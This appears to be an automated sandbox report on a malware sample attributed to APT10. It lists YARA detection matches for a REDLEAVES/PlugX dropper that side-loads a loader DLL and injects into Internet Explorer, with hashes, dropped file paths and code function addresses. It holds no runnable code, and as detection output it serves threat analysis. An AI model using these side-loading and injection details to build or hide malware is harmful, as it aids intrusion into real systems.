Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPEDMatched rule: Detects malware from Operation Cloud Hopper Author: Florian Roth
Source: cANdLlHS4N.exe, Initial file: MD5: b3139b26a2dabb9b6e728884d8fa8b33 Family: APT10 Alias: Stone Panda, APT 10, menuPass, happyyongzi, POTASSIUM, DustStorm, Red Apollo, CVNX, HOGFISH, APT10 Description: APT10 is the name given to a group of Chinese hackers first identified by FireEye. The group is said to have taken gigabytes of sensitive data from firms involved in the fields of aviation, space and satellite, manufacturing, pharmaceuticals, oil and gas exploration, communications, computer processor and maritime. References: https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html Data Source: https://github.com/RedDrip7/APT_Digital_Weapon
Source: cANdLlHS4N.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cANdLlHS4N.exe, type: SAMPLE, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.unpack, type: UNPACKEDPE, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.26e0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.26e0000.2.unpack, type: UNPACKEDPE, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 1.2.obedience.exe.6ed90000.1.unpack, type: UNPACKEDPE, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 3.2.obedience.exe.6ee50000.1.unpack, type: UNPACKEDPE, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.ca8bf8.1.raw.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 0.2.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 0.0.cANdLlHS4N.exe.9a0000.0.unpack, type: UNPACKEDPE, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 00000000.00000002.246163618.0000000002710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000003.00000002.273655894.000000006EE51000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000000.235573187.0000000000CA2000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000000.244543247.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000002.246143559.00000000026E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000000.244858067.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000000.235322946.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaves hash1 = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481, author = JPCERT/CC Incident Response Group, description = detect RedLeaves in memory, rule_usage = memory block scan, reference = https://blogs.jpcert.or.jp/en/2017/05/volatility-plugin-for-detecting-redleaves-malware.html
Source: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000001.00000002.248128854.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000003.00000002.273510822.0000000002410000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: RedLeaf author = kev, description = RedLeaf crypto function, cape_type = RedLeaf Payload
Source: 00000000.00000000.235102933.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTR, Matched rule: Dropper_DeploysMalwareViaSideLoading author = USG, description = Detect a dropper used to deploy an implant via side loading. This dropper has specifically been observed deploying REDLEAVES & PlugX, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481: drops REDLEAVES. 6392e0701a77ea25354b1f40f5b867a35c0142abde785a66b83c9c8d2c14c0c3: drops plugx.
Source: Process Memory Space: cANdLlHS4N.exe PID: 6048, type: MEMORYSTR, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTR, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTR, Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: obedience.exe PID: 488, type: MEMORYSTR, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTR, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTR, Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: iexplore.exe PID: 5844, type: MEMORYSTR, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTR, Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTR, Matched rule: PLUGX_RedLeaves date = 2017-04-03, author = US-CERT Code Analysis Team, MD5_5 = 566291B277534B63EAFC938CDAAB8A399E41AF7D, description = Detects specific RedLeaves and PlugX binaries, MD5_1 = 598FF82EA4FB52717ACAFB227C83D474, MD5_2 = 7D10708A518B26CC8C3CBFBAA224E032, MD5_3 = AF406D35C77B1E0DF17F839E36BCE630, MD5_4 = 6EB9E889B091A5647F6095DCD4DE7C83, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, incident = 10118538
Source: Process Memory Space: obedience.exe PID: 5080, type: MEMORYSTR, Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPED, Matched rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief author = USG, description = Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = fb0c714cd2ebdcc6f33817abe7813c36
Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, type: DROPPED, Matched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPED, Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, type: DROPPED, Matched rule: OpCloudHopper_Malware_6 date = 2017-04-03, hash1 = aabebea87f211d47f72d662e2449009f83eac666d81b8629cf57219d0ce31af6, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00A539D2
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00AADB4F
Source: C:\Users\user\Desktop\cANdLlHS4N.exe | Code function: 0_2_00ABECDC
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00482618
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_004847E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0043AC9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_00477074
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_0045DB80
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_6EDA0F49
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_6EDA0B77
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 1_2_6EDA07D9
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03029246
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302D2F5
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0300312C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0300B053
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03019774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302962E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03028641
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0300E6C7
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0300E4BC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03028AD6
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302D846
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302FE65
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03028E74
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302CDA4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_03022DC8
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_0302EC5B
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4E428
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B685AD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6959A
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B68DE0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6FDD1
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B62D34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6CD10
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B596E0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4E633
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6D7B2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B4AFBF
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B43098
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B691B2
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6D261
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B68A42
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | Code function: 2_2_04B6EBC7
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00482618
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_004847E4
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0045893C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0043AC9C
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_00477074
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_0045DB80
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_6EE60F49
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_6EE60B77
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_6EE607D9
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: 3_2_6EE60344
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 00403FD0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 00404A64 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 0047FD7C appears 50 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 00404A40 appears 183 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 00403BF0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 004070D0 appears 126 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 004104E4 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 0040F294 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\obedience.exe | Code function: String function: 0040A164 appears 106 times
